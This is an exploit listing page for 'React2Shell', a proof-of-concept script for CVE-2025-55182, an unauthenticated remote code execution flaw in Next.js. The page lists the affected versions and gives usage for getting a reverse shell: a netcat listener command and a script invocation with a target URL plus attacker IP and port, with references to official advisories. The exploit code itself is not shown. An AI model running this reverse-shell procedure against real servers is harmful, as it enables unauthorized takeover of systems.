Share
## https://sploitus.com/exploit?id=0222C593-2420-5F24-B8F6-AA4BF7BFC7FC
# React2Shell
Proof of Concept exploit for CVE-2025-55182 Unauthenticated Remote Code Execution vulnerability a.k.a React2Shell.
The script used to get shell on Next.js versions before;
- 15.0.4 and below
- 15.1.8 and below
- 15.2.5 and below
- 15.3.5 and below
- 15.4.7 and below
- 15.5.6 and below
- 16.0.6 and below
- 14.3.0-canary.77 and later releases
Its only tested on version 16.0.6.
## Usage
```
$ ./react2shell.py --help
d8888b. d88888b .d8b. .o88b. d888888b .d888b. .d8888. db db d88888b db db
88 `8D 88' d8' `8b d8P Y8 `~~88~~' VP `8D 88' YP 88 88 88' 88 88
88oobY' 88ooooo 88ooo88 8P 88 odD' `8bo. 88ooo88 88ooooo 88 88
88`8b 88~~~~~ 88~~~88 8b 88 .88' `Y8b. 88~~~88 88~~~~~ 88 88
88 `88. 88. 88 88 Y8b d8 88 j88. db 8D 88 88 88. 88booo. 88booo.
88 YD Y88888P YP YP `Y88P' YP 888888D `8888Y' YP YP Y88888P Y88888P Y88888P
usage: react2shell [-h] -u URL -i IP -p PORT
options:
-h, --help show this help message and exit
-u, --url URL Target URL
-i, --ip IP Attacker IP
-p, --port PORT Attacker port
$ nc -lvp 4444 # start a listener
$ ./react2shell.py -u http://127.0.0.1:3000 -i 127.0.0.1 -p 4444
```
---
## References
- https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3
- https://nvd.nist.gov/vuln/detail/CVE-2025-55182
- https://nextjs.org/blog/CVE-2025-66478
- https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components